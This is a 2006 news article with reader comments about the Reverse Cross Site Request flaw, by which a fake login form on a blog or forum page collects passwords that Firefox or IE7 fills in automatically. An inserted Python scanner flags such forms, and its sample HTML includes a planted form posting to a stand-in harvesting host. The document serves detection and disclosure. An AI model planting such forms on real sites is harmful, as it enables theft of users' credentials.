The Earthtimes online News


Security flaw detected on Firefox and IE7

A security flaw has been discovered in Mozilla Foundation's Firefox 2 and Microsoft's Internet Explorer 7 web browsers. Hackers can use this flaw to capture the username and password of users.
Posted : Thu, 23 Nov 2006 13:12:00 GMT
Author : Brian Holmes
Category : Internet

Firefox's Password Manager appears to be the source of the flaw. Once a user has saved a username and password for a site, the software automatically fills them into any login form it encounters on that site. An attacker can exploit this by placing a fake login form on the site: the browser fills in the saved username and password without being able to tell the fake form from the real one.

This is possible on sites that allow user-created pages, such as blogs and forums. The method was used against the social networking site MySpace in an incident reported in late October. The attacker registered a MySpace username and used the associated page to host a fake login form. Users who visited that page in Firefox while logged in to MySpace had their credentials compromised.

The flaw has been named Reverse Cross Site Request (RCSR) by Robert Chapin, who discovered it. RCSR poses a greater threat than cross-site scripting (XSS) because the page looks more convincing: it shows no sign of external content or open redirects. RCSR succeeds in both Firefox and IE because neither browser checks the destination server to which the form will send the password. And because the fake form sits on a trusted site, the browser raises no alert.

Robert Chapin has published a detailed description of the attack and a demonstration of how it works on his site. The site also warns that servers on firewalled local networks and HTTP addresses that are not generally accessible are especially exposed, since the attacker does not need direct access to them to receive the credentials.

While Firefox has been shown to be fully vulnerable to this attack, IE has a better defense. IE will not automatically fill in the username and password until it has checked the source of the login form, so it is tricked only if the RCSR form appears on the same page as a legitimate login form.
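As an added illustration of the destination check the article describes (this is not code from the article, from Firefox or from IE), the Python scan below parses a page's forms and flags any password form whose action resolves to an origin other than the page's own, which is exactly the condition that lets a form planted in user content receive autofilled credentials. The page URL and HTML are constructed sample data.

```python
"""Flag login forms that would post saved credentials to another origin."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a user profile page hosting a legitimate login form,
# a planted form posting to a different host, and an off-origin search form.
PAGE_URL = "https://www.example-social.test/profile/some-user"
SAMPLE_HTML = """
<form action="/login" method="post">
  <input name="user"><input type="password" name="pass">
</form>
<!-- form planted in user-editable content, posting to another host -->
<form action="https://harvest.example.test/collect" method="post">
  <input name="user"><input type="password" name="pass">
</form>
<form action="https://search.example-social.test/q"><input name="q"></form>
"""


def origin(url):
    """Scheme and host[:port] of a URL, lower-cased for comparison."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.netloc.lower())


class LoginFormScanner(HTMLParser):
    """Collect each <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # finished forms: {"action": str, "password": bool}
        self._current = None   # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)        # attribute values may be None in HTMLParser
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def offsite_password_forms(page_url, html):
    """Return resolved action URLs of password forms posting to a foreign origin."""
    scanner = LoginFormScanner()
    scanner.feed(html)
    scanner.close()
    flagged = []
    for form in scanner.forms:
        if not form["password"]:
            continue               # no credential field: not a harvesting form
        target = urljoin(page_url, form["action"])  # "" means the page itself
        if origin(target) != origin(page_url):
            flagged.append(target)
    return flagged


if __name__ == "__main__":
    print(offsite_password_forms(PAGE_URL, SAMPLE_HTML))
```

Only the planted form is reported: the legitimate form posts to the page's own origin, and the search form has no password field.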

A bug report regarding this flaw has been filed with Mozilla but no fix has yet been found. Security experts have recommended that Firefox's Password Manager be disabled and the Master Password Timeout extension be installed.

This extension locks the master security device after a specific period of inactivity. Users have also been advised to disable the “Remember password for sites” option in Firefox.

Copyright, respective author or news agency
Your Comments

1.5
By: nosheen , Tue, 28 Nov 2006 09:47:35 GMT

Is Firefox 1.5 safe?


no
By: Ripal , Fri, 24 Nov 2006 10:45:18 GMT

no


Firefox Password Security Flaw
By: Jimmy Crackcorn , Fri, 24 Nov 2006 10:38:10 GMT

Does anyone know if the recent security flaw found with Firefox and its saved password feature affects all versions of FF or just Firefox 2?


Internet explorer 7
By: Debbie Olson , Fri, 24 Nov 2006 02:12:56 GMT

I have big fix but I can't get in to find out about it. I would like to go back to Explorer 6 but don't know if I can.

© 2008 www.earthtimes.org, The Earth Times, All Rights Reserved